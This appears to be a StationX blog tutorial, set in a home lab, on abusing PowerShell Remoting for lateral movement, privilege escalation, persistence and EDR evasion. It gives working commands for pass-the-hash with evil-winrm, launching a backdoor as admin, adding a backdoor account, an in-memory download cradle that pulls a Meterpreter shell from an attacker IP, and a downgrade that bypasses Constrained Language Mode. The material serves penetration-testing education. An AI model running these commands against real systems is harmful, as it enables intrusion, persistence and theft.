PowerShell Remoting for Hackers: Domain Takeover in 2025

PowerShell Remoting

PowerShell Remoting is a native Windows feature that can be used to take over entire enterprises. It allows you to pivot between machines, automate hacking tasks, and dominate Windows environments while remaining undetected. 

This comprehensive guide will teach you about PowerShell Remoting and how to use it to start interactive sessions, execute remote commands, and run complete PowerShell scripts against multiple machines. 

You’ll also see how it can be used for common penetration testing actions like lateral movement, privilege escalation, and establishing persistence while evading detection.

Let’s jump straight in and learn how to do PSRemoting.

What Is PowerShell Remoting? 

PowerShell Remoting is a feature of Windows PowerShell that allows system administrators to execute commands and scripts on machines in their Windows environment remotely. This is similar to running commands or scripts using SSH on Linux servers.

It’s designed for IT admins to perform remote management and automation tasks on systems in an enterprise environment. 

With a single command or script, you can update software, change configuration settings, or edit services across multiple machines. SOC analysts or responders can also use it to collect logs for analysis or perform remediation actions quickly. 

In summary, PowerShell Remoting has the following key features:

Remote Command Execution (RCE): Run commands or scripts on remote systems.
Interactive: Start an interactive remote session and run remote commands as if you were in a local PowerShell terminal. 
Script Execution: Execute complete PowerShell scripts as background jobs on multiple machines at once to perform using asynchronous task execution.
Secure: Use encrypted communication channels (WinRM) with Kerberos support and NTLM authentication.
Scalable: Use PowerShell Remoting across hundreds of machines concurrently, allowing you to control and manage fleets of enterprise workstations and servers.

These features make PowerShell Remoting great for IT admins. However, it can also be used by penetration testers to perform security tests on systems or by hackers during a cyber attack.

In the following section, we’ll look at how PowerShell remoting can be used for pentesting.

Execute Commands Remotely

PowerShell Remoting allows you to execute commands and scripts on remote systems. This means you don’t need to sit in front of the workstation you’re targeting to perform attacks. Once you’re inside the network, you can attack any network-connected machine. 

Stealth and Evasion

PowerShell is built into modern Windows systems, and PowerShell Remoting is a legitimate feature IT staff use to administer machines. This means attackers can use this native technology to blend in with legitimate traffic, reduce the need to upload additional hacking tools, and fly under the radar of defenders.

Also, PowerShell Remoting is encrypted. This makes it harder for security operations teams to detect and analyze malicious traffic.

Automated Reconnaissance and Exploitation

PowerShell Remoting allows you to execute entire PowerShell scripts against hundreds of machines at once. This is perfect for automating common reconnaissance and exploitation tasks like scanning network ports, finding vulnerable machines, and performing credential stuffing. Automating saves you time and energy.

Post-Exploitation Activities

After gaining initial access, hackers will perform post-exploitation activities like setting up persistence mechanisms, performing credential harvesting to exfiltrate data, and eventually performing lateral movement. Again, PowerShell Remoting is an excellent tool with its ability to remote code execution, native support in Windows environments, and automation capabilities. 

Set Up and Enable PowerShell Remoting

PowerShell Remoting is disabled by default on Windows machines. To enable remoting, open a PowerShell terminal as an Administrator and execute the command Enable-PSRemoting -Force. This will turn on the PowerShell Remoting feature and ensure the Windows firewall allows WinRM traffic.

If you can establish a WMIC connection to the target, you can activate PowerShell Remoting remotely using the Windows Management Instrumentation (WMI) command wmic /node:<RemoteHost> process call create "powershell enable-psremoting -force".

This is all you need if you’re using domain-joined computers to perform PowerShell Remoting. 

However, if you execute remote PowerShell commands from a computer not connected to the same domain as the target machine, your machine is considered an “untrusted host.” For instance, your Kali Linux machine would be an untrusted host.

To ensure PowerShell Remoting works from any machine, you must either add that single machine to the Trusted Hosts list for the machine you’re PowerShell Remoting into or set all hosts as trusted hosts using a wildcard (*):

  • To add your machine, execute the command Set-Item wsman:\localhost\Client\TrustedHosts -Value "<YourComputerName>".
  • To add all hosts, run the command Set-Item wsman: localhostClientTrustedHosts -Value *. Use this command only in controlled testing environments.

Again, run these commands from a PowerShell terminal as an Administrator on the target machine.

To test your connection from a Kali Linux machine, you can use the built-in evil-winrm tool. Run the command evil-winrm -i <target-ip> -u <username> -p <password> to see if you can connect to the target machine using the WinRM protocol.

If successful, you can use PowerShell Remoting to execute PowerShell commands and scripts. 

The demonstrations in this article use a custom-built Windows Active Directory hacking lab and assume you were able to steal the credentials of an Active Directory user to access the environment. Read How to Create a Virtual Hacking Lab: Ultimate Setup to learn how to build your own hacking lab.

How to Use PowerShell Remoting: Commands

Once PowerShell Remoting has been enabled on the target machine, you can start running remote PowerShell commands. 

Firstly, to establish a PowerShell Remoting session with the target, open a PowerShell terminal on your Kali Linux machine using the dropdown menu at the top of the GUI.

Next, run Enter-PSSession -ComputerName <target-ip> -Authentication Negotiate -Credential <username>. This will connect to the remote target and ask you to enter the password associated with the specified username. Entering this will start a remote PowerShell session on the target machine. 

Once you’ve established a PowerShell Remoting session, you can interact with the target machine just like you had opened a PowerShell terminal locally. 

PowerShell Remoting Scripts

PowerShell commands are great, but you probably don’t want to run them interactively, one by one every time. 

Good news: PowerShell Remoting allows you to bundle your commands into a script and execute it asynchronously on a target machine to automate tasks.         

First, create a PowerShell variable to hold the PowerShell Remoting session with the command $ps_session = New-PSSession  -ComputerName <target-ip> -Authentication Negotiate -Credential <username>. This allows you to reference the variable whenever you want to run PowerShell commands or scripts on the remote machine.

Next, use the Invoke-Command cmdlet with the -Session and -ScriptBlock options to run several PowerShell commands at once. For example, Invoke-Command -Session $ps_session -ScriptBlock {hostname; whoami; Get-Process;} will get the hostname of the machine (1), the user you’re logged in as (2), and list all the processes running (3)—all the basic domain reconnaissance in one command.

To execute a PowerShell script, rather than a script block, use the -FilePath option followed by the path to the script you want to execute. For instance, Invoke-Command -Session $ps_session -FilePath /home/adam/host-recon.ps1

Here, the host-recon.ps1 script contains the same PowerShell commands as before, just in a script rather than listed individually. Check out PowerSploit for excellent PowerShell hacking scripts to run during a penetration test.

PowerShell Remoting Session Management

You just saw how the Enter-PSSession cmdlet can create an interactive session, and New-PSSession creates a session you can use to execute commands. These are PowerShell Remoting session management cmdlets used to manage sessions. Here is a summary of all the session management cmdlets you can use:

CmdletDescriptionExample
Enter-PSSessionStarts an interactive session with a remote computer where you can run commands directly.Enter-PSSession -ComputerName <RemoteComputerName>
Exit-PSSessionEnds an interactive session started with Enter-PSSession.Exit-PSSession
New-PSSessionCreates persistent remote connections to one or more computers so you can run multiple commands simultaneously.$session = New-PSSession -ComputerName RemoteComputerName
Remove-PSSessionCloses one or more remote sessions created by New-PSSession.Remove-PSSession -Session $session
Get-PSSessionRetrieves the PowerShell sessions that are currently available on your local machine. Get-PSSession

PowerShell Remoting for Hackers

PowerShell Remoting is a powerful feature that system administrators can use to manage systems, but hackers can also abuse it. 

Malicious actors can use PowerShell Remoting to perform lateral movement, escalate their privileges, install persistence mechanisms, and evade detection. 

Let’s explore how you can do this during a penetration test.

PowerShell Remoting for Lateral Movement

Lateral movement is a key step in any penetration test, and PowerShell Remoting can make it very easy. 

You just need to steal credentials from a compromised system using a tool like Mimikatz or Meterpreter. Then, use these credentials to authenticate to other systems using PowerShell Remoting. 

For example, below, the stolen NTLM hash of the StationX admin account is used with the evil-winrm hacking tool to perform a pass-the-hash attack using PowerShell Remoting. The command ran is evil-winrm -i <target-ip> -u <username> -H <hash>.

PowerShell Remoting lets you start interactive sessions as other users execute scripts or run commands on multiple systems across the entire Active Directory network. You’re only limited by what the stolen credentials can access and if PowerShell Remoting is enabled. 

PowerShell Remoting for Privilege Escalation

PowerShell Remoting can also be used to elevate your privileges on a target machine by executing arbitrary PowerShell commands. 

You can run specific commands to check for privilege escalation opportunities or entire scripts that automatically escalate your privileges

For instance, many post-exploitation activities during a penetration test require elevated privileges, such as checking for misconfigurations, installing persistence mechanisms, or exfiltrating sensitive data. 

You can start an elevated reverse shell using PowerShell Remoting with the command Invoke-Command -Session $ps_session -ScriptBlock { Start-Process “C:\Users\stationx-admin\Downloads\backdoor.exe” -Verb RunAs }.

The -Verb RunAs parameter will start the backdoor.exe executable as a process with administrative privileges. In this case, it will start an administrator reverse shell on the target machine that you can use to perform post-exploitation tasks, such as escalating your privileges to the system user. 

Below, this reverse shell is caught using Metasploit, and the getsystem Meterpreter command is successful because the shell is running with admin privileges.

The commands demonstrated here run against a Windows 10 machine with Microsoft Windows Defender and Smart Screen disabled.

PowerShell Remoting for Persistence

A common post-exploitation task is installing persistence mechanisms that allow you to maintain access to a target machine even when the user logs out or reboots the system. 

You can use various persistence mechanisms, such as creating a Windows Startup folder script that connects to your command and control (C2) server, installing a malicious service, or using a registry run key. 

A common persistence mechanism in cyber attacks is the creation of new user accounts in the target environment. You can do this using PowerShell Remoting with the command Invoke-Command -Session $ps_session -ScriptBlock { net user <username> <password>  /add }.

Here, the new user hacker is created, and you can use it as a backdoor to log in to this system. You could also add it to privileged groups to give it more access within the target environment. 

Just ensure you have the required user permissions to add this new user with the account you use for PowerShell Remoting. 

Avoiding Detection

As mentioned, lateral movement is a key step in any penetration test. However, usually, this requires you to use a C2 framework like PowerShell Empire and install a C2 agent on each machine you move to so you can interact with it. 

This is where most penetration tests get detected. Anti-virus software or an Endpoint Detection and Response (EDR) tool will scan the machine and detect if malicious software is present (e.g., your C2 agent). 

It will then quarantine or remove this malware, and your access will be lost. To avoid this, penetration testers and red teamers spend days or weeks writing custom C2 implants that can evade detection. 

If this sounds like a lot of work, don’t worry: this is where PowerShell Remoting shines. In fact, your PowerShell Remoting sessions, commands, and scripts run entirely in memory. 

This means common detection techniques like signature-based scanning won’t detect your post-exploitation activities, and you can perform lateral movement without disruption. 

Additionally, because PowerShell Remoting is so common in enterprise environments, your actions will likely go unnoticed by defenders, unlike with a tool like PsExec

PsExec is not pre-installed on most workstations or servers, so your chances of blending into the target environment are lower than PowerShell Remoting.

One way to use PowerShell Remoting to remain undetected is to download and execute PowerShell scripts completely in memory on a target machine. 

For instance, this command uses a PowerShell download cradle to download and execute a Meterpreter reverse shell entirely in memory: Invoke-Command -Session $ps_session -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://10.0.200.17:8000/backdoor.ps1’) }.

The Meterpreter reverse shell is downloaded from the attacker machine (10.0.200.17) and executed on the target machine without touching the disk, evading on-disk detection mechanisms. A fully interactive shell connects back to your attack machine.

This is just a reverse shell. You could also download and execute data exfiltration scripts, C2 agents, or any other malware that allows you to achieve your objectives. 

However, before getting ahead of yourself, remember that PowerShell Remoting has some limitations, especially if Constrained Language Mode is enabled. 

PowerShell scripts must be allowed to execute on the Windows system you’re attacking to download and execute them in memory. You can enable this by changing the Set-Execution policy parameter.

Constrained Language Mode

Constrained Language Mode (CLM) is a PowerShell security feature that restricts the commands and scripts you can run. It limits the use of certain cmdlets and language features that hackers can abuse, such as restrictions on using .NET classes and methods commonly seen in malware. 

It also blocks access to certain .NET framework types that can be used to execute arbitrary code or access sensitive system resources like the Local Security Authority Subsystem Service (LSASS). Hackers need this access to steal credentials and perform credential harvesting.

Once CLM is enabled, system administrators define what scripts can be run, what .NET framework types can be used, and what PowerShell language features users can access. This severely limits your PowerShell Remoting capabilities.

You can execute the PowerShell command $ExecutionContext.SessionState.LanguageMode to detect if CLM is enabled.

This will return the language mode for the current system:

  • FullLanguage: This is the default mode. It provides full scripting capabilities without any restrictions. All cmdlets, language features, and .NET types are available.
  • RestrictedLanguage: This option limits you to basic cmdlets and expressions. It doesn’t allow complex language scripts, constructs, or .NET types.
  • NoLanguage: Here, script execution is completely disabled, and only basic command execution is allowed.
  • ConstrainedLanguage: In this mode, basic scripting is allowed, but access to advanced features and .NET types is restricted. This language only allows you to perform basic administrative tasks.

If you find CLM is enabled on the machine you’re PowerShell Remoting to, you can try several bypass methods. 

The easiest way to bypass CLM is to downgrade your PowerShell remote session to a previous PowerShell version. For instance, you can downgrade to PowerShell version 2.0 with the command powershell -version 2.

Downgrading to an older PowerShell version requires that version to have already been installed on your target machine. If this isn’t the case, there are other CLM bypasses, including: 

Let’s see how PowerShell Remoting compares to another tool commonly used for lateral movement in Windows environments.

PowerShell Remoting vs PsExec

PsExec is another popular tool frequently used by threat actors to perform lateral movement, escalate privileges, and execute remote code. 

This command-line utility is part of Microsoft's Sysinternals suite. It’s lightweight and standalone, and system administrators often install it in enterprise environments. 

PsExec shares many similarities with PowerShell Remoting. They work well in Windows environments, blend in with legitimate administrator work, and are great for post-exploitation tasks. 

However, unlike PowerShell Remoting, PsExec is designed for quick, ad-hoc tasks like running simple commands or non-PowerShell executables. 

You can’t use it to automate complex tasks like executing complete scripts, running commands against multiple machines, or creating an interactive session. It only shines when performing single tasks with minimal configuration. 

PowerShell Remoting is the way to go if you want a more robust solution. The only issues are whether it’s configured in the environment you’re targeting and whether you can bypass any PowerShell protections like CLM. 

Conclusion

PowerShell Remoting is a powerful Windows feature that allows you to perform lateral movement, escalate privilege, and install persistence mechanisms. 

This guide demonstrated how to use it to start interactive sessions, run ad-hoc commands, and execute entire PowerShell scripts that can automate many hacking tasks. 

You’ve also seen how to use PowerShell Remoting to evade detection, discovered tips on bypassing PowerShell’s Constrained Language Mode (CLM), and learned how PowerShell Remoting stacks up against PsExec. 

We encourage you to set up your hacking lab and play with this Windows feature's awesome capabilities.

If you want to learn more about PowerShell, Windows Active Directory, or penetration testing in general, join our StationX Accelerator Program. It includes everything you need to crush it in cyber security with 1000+ courses and labs, mentorship, and mastermind groups. 

Here are some of the courses available:

Frequently Asked Questions

Level Up in Cyber Security: Join Our Membership Today!

vip cta image
vip cta details
  • Adam is a seasoned cyber security professional with extensive experience in cyber threat intelligence and threat hunting. He enjoys learning new tools and technologies, and holds numerous industry qualifications on both the red and blue sides. Adam aims to share the unique insights he has gained from his experiences through his blog articles. You can find Adam on LinkedIn or check out his other projects on LinkTree.

>

StationX Accelerator Pro

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Pro Program. Stay tuned for more!

StationX Accelerator Premium

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Accelerator Premium Program. Stay tuned for more!

StationX Master's Program

Enter your name and email below, and we’ll swiftly get you all the exciting details about our exclusive StationX Master’s Program. Stay tuned for more!